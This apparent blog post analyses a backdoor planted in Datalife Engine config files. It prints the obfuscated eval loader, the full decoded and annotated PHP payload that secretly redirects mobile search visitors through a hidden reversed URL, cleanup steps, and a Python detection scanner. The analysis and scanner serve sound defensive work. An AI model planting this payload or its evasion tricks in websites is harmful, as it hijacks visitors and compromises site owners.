Beware of Backdoor Code in Datalife Engine

This common Datalife Engine (DLE) backdoor has been around for a long time, and it gets planted into your system without you noticing. Let's analyze the code.
The backdoor code is usually injected into engine/data/config.php or engine/data/dbconfig.php. Here is a snippet for demonstration:
@eVAl(gzUncOmprEss(base64_decode('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')));
Hard to make sense of, isn't it? Printing the decoded string directly with var_dump gives this code:
string(3405) "if(!defined('SORRYCHIEF')){define('SORRYCHIEF',true);$versin='260423';$tim='22';$doc=$_SERVER['DOCUMENT_ROOT'];if(@is_dir($doc .'/uploads/posts/')){$pathh=$doc .'/uploads/posts/';}elseif(@is_dir($doc .'/wp-includes/')){$pathh=$doc .'/wp-includes/';}elseif(@is_dir($doc .'/cache/')){$pathh=$doc .'/cache/';}elseif(@is_dir($doc .'/bitrix/modules/')){$pathh=$doc .'/bitrix/modules/';}elseif(@is_dir($doc .'/system/library/')){$pathh=$doc .'/system/library/';}elseif(@is_dir($doc .'/includes/database/')){$pathh=$doc .'/includes/database/';}$time_file=$pathh ."timer.jpeg";$stat_file=$pathh ."stats.jpeg";$work_file=$pathh ."watermark.jpeg";$yahooo='__' .'us' .'er_' .'i' .'d_';$yahooo1=$yahooo .'1';$yahooo2=$yahooo .'2';$yahooo3=$yahooo .'3';$yahooo4=$yahooo .'4';$yahooo5=$yahooo .'5';$yahoooeu='__' .'us' .'er_' .'i' .'ds_';$ser=@$_SERVER;$hos=@$ser['HTT' .'P_HO' .'ST'];$rf=@$ser['HT' .'TP_REF' .'ERER'];$ref=@$ser['REQU' .'EST_URI'];$usg=@$ser['HT' .'TP_USE' .'R_AGENT'];if((!$usg)or($usg=='')or(@!preg_match('/baidu|ia_arch|oogle|igma|Bot|andex|bot|pider|EltaIn|curl|ahoo|amble|W3C_|YaBrow|rawle|Wget|mail./i',$usg))){if(@preg_match('/andex.|pinter|sogou|shenma|instag|yahoo.|msn.c|utube|odnok|ut.by|baidu|mail.r|search|smi2|igma|ambler|witter|ok.ru|vk.co|ulog|facebo.|oogle.|duckduck|naver|aol.c|rbc.|bing./i',$rf)){if((@preg_match('/p.browser|htc_|mini|symbos|obile|ndroid|midp|ymbian|j2me|eries\ 60|phone/i',$usg))and(@!isset($_COOKIE['dle_user_id']))and(@!preg_match('/=addnews|admin.php|=logout|=register|=feedback|login.php|administration/i',$ref))and($ref != 
'/')){@$yeasss="1";}}}if((@file_exists($work_file))&(@filesize($work_file)>1)&(@isset($_COOKIE[$yahoooeu]))&(@!isset($_COOKIE[$yahooo]))){@setcookie($yahooo,'79214477',time()+84214,'/');if(@!file_exists($time_file)){@file_put_contents($time_file,time()+85000);@file_put_contents($stat_file,"1");}$my_time=@file_get_contents($time_file);if($my_time>@time()){$f=@fopen($stat_file,"a+");@flock($f,LOCK_EX);$count=@fread($f,@filesize($stat_file));@$count++;@ftruncate($f,0);@fwrite($f,$count);@fflush($f);@flock($f,LOCK_UN);@fclose($f);}else{@unlink($time_file);@unlink($stat_file);@file_put_contents($work_file,"");}if(@file_exists($stat_file)){$count=@file_get_contents($stat_file);if($count>$tim){@unlink($time_file);@unlink($stat_file);@unlink($work_file);}}}if((@file_exists($work_file))&(@filesize($work_file)>1)&(@$yeasss == "1")&(!isset($_COOKIE[$yahoooeu]))){@setcookie($yahoooeu,'79214477',time()+84214,'/');}if(@!file_exists($work_file)&(@!isset($_COOKIE[$yahooo5]))){$bre=$_COOKIE[$yahooo];if(@isset($_COOKIE[$yahooo3])){@setcookie($yahooo4,'4',time()+84214,'/');}if(@isset($_COOKIE[$yahooo2])){@setcookie($yahooo3,'3',time()+84214,'/');}if(@isset($_COOKIE[$yahooo1])){@setcookie($yahooo2,'2',time()+84214,'/');}if(@isset($_COOKIE[$yahooo])){@setcookie($yahooo1,'1',time()+84214,'/');}if((@isset($_COOKIE[$yahooo6]))or(@isset($_COOKIE[$yahooo2]))or(@isset($_COOKIE[$yahooo3]))or(@isset($_COOKIE[$yahooo4]))){@setcookie($yahooo5,'954',@time()+85114,'/');@header(@strrev('21?ig' .'c.n' .'iw' .'/pame' .'tis/sk' .'ce' .'hc/cc' .'.s' .'pam-e' .'tis/' .'/:sp' .'tth :n' .'oita' .'coL') .'&seor' .'ef=' .rawurlencode($rf) .'parameter=\$keyword&se=\$se&ur=1' .strrev(strtoupper('=rerefer_ptth&')) .rawurlencode('http://' .$hos .$ref));exit;}if((!isset($_COOKIE[$yahooo]))&(@$yeasss == "1")){@setcookie($yahooo,'0',time()+84214,'/');}}}"
Still rather messy, right? Let's format the code:
<?php
if (!defined("SORRYCHIEF")) {
    define("SORRYCHIEF", true);
    $versin = "260423";
    $tim = "22";
    $doc = $_SERVER["DOCUMENT_ROOT"];
    // Pick an existing directory to drop files into, whichever CMS is installed
    if (@is_dir($doc . "/uploads/posts/")) {
        $pathh = $doc . "/uploads/posts/";
    } elseif (@is_dir($doc . "/wp-includes/")) {
        $pathh = $doc . "/wp-includes/";
    } elseif (@is_dir($doc . "/cache/")) {
        $pathh = $doc . "/cache/";
    } elseif (@is_dir($doc . "/bitrix/modules/")) {
        $pathh = $doc . "/bitrix/modules/";
    } elseif (@is_dir($doc . "/system/library/")) {
        $pathh = $doc . "/system/library/";
    } elseif (@is_dir($doc . "/includes/database/")) {
        $pathh = $doc . "/includes/database/";
    }
    // State files disguised as images
    $time_file = $pathh . "timer.jpeg";
    $stat_file = $pathh . "stats.jpeg";
    $work_file = $pathh . "watermark.jpeg";
    // Cookie names assembled from fragments (__user_id_1 .. __user_id_5, __user_ids_)
    $yahooo = "__" . "us" . "er_" . "i" . "d_";
    $yahooo1 = $yahooo . "1";
    $yahooo2 = $yahooo . "2";
    $yahooo3 = $yahooo . "3";
    $yahooo4 = $yahooo . "4";
    $yahooo5 = $yahooo . "5";
    $yahoooeu = "__" . "us" . "er_" . "i" . "ds_";
    // Request headers, read through split strings to dodge simple signatures
    $ser = @$_SERVER;
    $hos = @$ser["HTT" . "P_HO" . "ST"];
    $rf = @$ser["HT" . "TP_REF" . "ERER"];
    $ref = @$ser["REQU" . "EST_URI"];
    $usg = @$ser["HT" . "TP_USE" . "R_AGENT"];
    // Target selection: not a crawler, arriving from a search engine or social
    // network, on a mobile browser, not logged in to DLE, not on an admin/login page
    if (
        !$usg or
        $usg == "" or
        @!preg_match(
            "/baidu|ia_arch|oogle|igma|Bot|andex|bot|pider|EltaIn|curl|ahoo|amble|W3C_|YaBrow|rawle|Wget|mail./i",
            $usg
        )
    ) {
        if (
            @preg_match(
                "/andex.|pinter|sogou|shenma|instag|yahoo.|msn.c|utube|odnok|ut.by|baidu|mail.r|search|smi2|igma|ambler|witter|ok.ru|vk.co|ulog|facebo.|oogle.|duckduck|naver|aol.c|rbc.|bing./i",
                $rf
            )
        ) {
            if (
                @preg_match(
                    "/p.browser|htc_|mini|symbos|obile|ndroid|midp|ymbian|j2me|eries\ 60|phone/i",
                    $usg
                ) and
                @!isset($_COOKIE["dle_user_id"]) and
                @!preg_match(
                    "/=addnews|admin.php|=logout|=register|=feedback|login.php|administration/i",
                    $ref
                ) and
                $ref != "/"
            ) {
                @$yeasss = "1";
            }
        }
    }
    // Hit counter in stats.jpeg with a deadline in timer.jpeg; watermark.jpeg
    // is emptied or removed once the window or the count ($tim) is exhausted
    if (
        @file_exists($work_file) &
        (@filesize($work_file) > 1) &
        @isset($_COOKIE[$yahoooeu]) &
        @!isset($_COOKIE[$yahooo])
    ) {
        @setcookie($yahooo, "79214477", time() + 84214, "/");
        if (@!file_exists($time_file)) {
            @file_put_contents($time_file, time() + 85000);
            @file_put_contents($stat_file, "1");
        }
        $my_time = @file_get_contents($time_file);
        if ($my_time > @time()) {
            $f = @fopen($stat_file, "a+");
            @flock($f, LOCK_EX);
            $count = @fread($f, @filesize($stat_file));
            @$count++;
            @ftruncate($f, 0);
            @fwrite($f, $count);
            @fflush($f);
            @flock($f, LOCK_UN);
            @fclose($f);
        } else {
            @unlink($time_file);
            @unlink($stat_file);
            @file_put_contents($work_file, "");
        }
        if (@file_exists($stat_file)) {
            $count = @file_get_contents($stat_file);
            if ($count > $tim) {
                @unlink($time_file);
                @unlink($stat_file);
                @unlink($work_file);
            }
        }
    }
    if (
        @file_exists($work_file) &
        (@filesize($work_file) > 1) &
        (@$yeasss == "1") &
        !isset($_COOKIE[$yahoooeu])
    ) {
        @setcookie($yahoooeu, "79214477", time() + 84214, "/");
    }
    // Cookie ladder: each visit advances one step; after enough visits the
    // visitor is redirected. The Location URL is reversed with strrev to hide it.
    if (@!file_exists($work_file) & @!isset($_COOKIE[$yahooo5])) {
        $bre = $_COOKIE[$yahooo];
        if (@isset($_COOKIE[$yahooo3])) {
            @setcookie($yahooo4, "4", time() + 84214, "/");
        }
        if (@isset($_COOKIE[$yahooo2])) {
            @setcookie($yahooo3, "3", time() + 84214, "/");
        }
        if (@isset($_COOKIE[$yahooo1])) {
            @setcookie($yahooo2, "2", time() + 84214, "/");
        }
        if (@isset($_COOKIE[$yahooo])) {
            @setcookie($yahooo1, "1", time() + 84214, "/");
        }
        if (
            @isset($_COOKIE[$yahooo6]) or
            @isset($_COOKIE[$yahooo2]) or
            @isset($_COOKIE[$yahooo3]) or
            @isset($_COOKIE[$yahooo4])
        ) {
            @setcookie($yahooo5, "954", @time() + 85114, "/");
            @header(
                @strrev(
                    "21?ig" .
                    "c.n" .
                    "iw" .
                    "/pame" .
                    "tis/sk" .
                    "ce" .
                    "hc/cc" .
                    ".s" .
                    "pam-e" .
                    "tis/" .
                    "/:sp" .
                    "tth :n" .
                    "oita" .
                    "coL"
                ) .
                "&seor" .
                "ef=" .
                rawurlencode($rf) .
                'parameter=\$keyword&se=\$se&ur=1' .
                strrev(strtoupper("=rerefer_ptth&")) .
                rawurlencode("http://" . $hos . $ref)
            );
            exit();
        }
        if (!isset($_COOKIE[$yahooo]) & (@$yeasss == "1")) {
            @setcookie($yahooo, "0", time() + 84214, "/");
        }
    }
}
?>
That is much clearer!
First, it checks whether the constant SORRYCHIEF is already defined; if not, it defines it and sets it to true, so the payload runs only once per request even if it has been injected into several files.
Next, two variables, $versin and $tim, are defined and assigned the strings '260423' and '22'.
Then it reads $_SERVER['DOCUMENT_ROOT'] into $doc.
A chain of if...elseif statements checks which directory exists and stores the first match in $pathh. It checks, in order: /uploads/posts/, /wp-includes/, /cache/, /bitrix/modules/, /system/library/, /includes/database/. The list covers directory layouts of several other CMSes besides DLE, so the same payload works on other kinds of sites on the server.
Three file-path variables are defined, $time_file, $stat_file and $work_file, by appending the names timer.jpeg, stats.jpeg and watermark.jpeg to $pathh. Despite the extension these are not images but the backdoor's state files.
A set of cookie-name variables ($yahooo, $yahooo1 to $yahooo5, $yahoooeu) is defined; each value is built by concatenating '__' . 'us' . 'er_' . 'i' . 'd_' with a numeric suffix, giving __user_id_1 to __user_id_5 and __user_ids_. The strings are split into fragments so that a plain text search for the cookie names finds nothing.
$_SERVER is copied into $ser.
$ser['HTTP_HOST'] is assigned to $hos, $ser['HTTP_REFERER'] to $rf, $ser['REQUEST_URI'] to $ref and $ser['HTTP_USER_AGENT'] to $usg.
A series of conditions follows: if $usg is empty or does not match the listed crawler/search-engine keywords, the next check runs. That check requires a referrer that looks like a search engine or social network, a mobile user agent, no dle_user_id cookie (so a logged-in DLE user, such as the site owner, is never redirected), and a request that is neither the front page nor an admin or login URL; only then is $yeasss set to "1". This is why the site owner typically sees nothing wrong while mobile visitors arriving from search results are affected.
It then checks whether $work_file exists with a size greater than 1 and whether the __user_ids_ cookie is present while the __user_id_ cookie is not. If so, it sets the cookie and performs the file operations: a deadline is written to timer.jpeg, a hit counter is kept in stats.jpeg, and watermark.jpeg is emptied or removed once the deadline passes or the counter exceeds $tim.
Further checks follow, deleting files and setting cookies according to the conditions. The final branch advances a visitor one step along the __user_id_1 to __user_id_4 cookie ladder on each visit; once the required step is reached it sets __user_id_5, emits a Location header whose target URL is assembled with strrev so it does not appear in plain text, appends the original referrer and URL as parameters, and calls exit(), so the visitor is redirected away from the site.
If you have been hit, removing the code from config.php or dbconfig.php alone is not enough; you also have to delete the timer.jpeg, stats.jpeg and watermark.jpeg files under /uploads/posts/. I have had the misfortune of being hit several times. Fortunately this code only redirects to a specified URL under particular conditions, but it is still dangerous. I once tried replacing the site files with the official original version, applying only the most basic crack, hoping to clean out the malicious code, but after a while the code seemed to be injected into the files again, which is rather a headache.
I would urge everyone using DLE not to install plugins of unknown origin, hacked templates, or anything else that can threaten security. This applies not only to DLE but, as far as possible, to the other sites on the same server as well.
Finally, I hope everyone pays attention to website security and keeps their data safe. I am also working on an effective way to prevent this from happening as far as possible.
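An added example (not code from the original post or from the DLE project): a Python scanner that finds this loader shape in PHP files, decodes the payload offline with zlib (PHP's gzuncompress format) instead of executing it, and checks the drop directories named in the payload for the three .jpeg state files. The config file it scans is a constructed sample, not the real blob from the post.

```python
import base64
import re
import zlib
from pathlib import Path

# Loader shape from the post: @eVAl(gzUncOmprEss(base64_decode('...'))), in mixed case.
LOADER_RE = re.compile(
    rb"eval\s*\(\s*gzuncompress\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]",
    re.IGNORECASE,
)
# Strings the decoded payload in the post contains; used to confirm a hit.
PAYLOAD_MARKERS = ("SORRYCHIEF", "watermark.jpeg", "timer.jpeg", "stats.jpeg")
# Directories the payload probes for, and the files it drops there.
DROP_DIRS = ("uploads/posts", "wp-includes", "cache", "bitrix/modules",
             "system/library", "includes/database")
DROP_FILES = ("timer.jpeg", "stats.jpeg", "watermark.jpeg")


def decode_payload(blob: bytes) -> str:
    """Reverse the loader offline: base64 -> zlib (PHP gzuncompress) -> text. Never eval."""
    return zlib.decompress(base64.b64decode(blob)).decode("utf-8", "replace")


def scan_source(src: bytes) -> list:
    """One finding per loader in PHP source: byte offset plus payload markers seen."""
    findings = []
    for m in LOADER_RE.finditer(src):
        try:
            decoded = decode_payload(m.group(1))
        except (ValueError, zlib.error):
            decoded = ""  # not a valid blob; still report the loader itself
        findings.append({"offset": m.start(),
                         "markers": [k for k in PAYLOAD_MARKERS if k in decoded]})
    return findings


def find_dropped_files(docroot: Path) -> list:
    """Return timer/stats/watermark.jpeg paths present in the directories the payload uses."""
    return [docroot / d / f for d in DROP_DIRS for f in DROP_FILES
            if (docroot / d / f).is_file()]


# Constructed sample (not the real blob from the post): a harmless payload wrapped the same way.
SAMPLE_PAYLOAD = b"if(!defined('SORRYCHIEF')){define('SORRYCHIEF',true);$w='watermark.jpeg';}"
SAMPLE_CONFIG = (b"<?php\n$db_host='localhost';\n@eVAl(gzUncOmprEss(base64_decode('"
                 + base64.b64encode(zlib.compress(SAMPLE_PAYLOAD)) + b"')));\n")

if __name__ == "__main__":
    print(scan_source(SAMPLE_CONFIG))  # one finding, markers SORRYCHIEF and watermark.jpeg
    print(find_dropped_files(Path(".")))
```

To sweep a real site, call scan_source on the bytes of every .php file under the document root (not just config.php, since the loader can sit in any file) and find_dropped_files on the root itself.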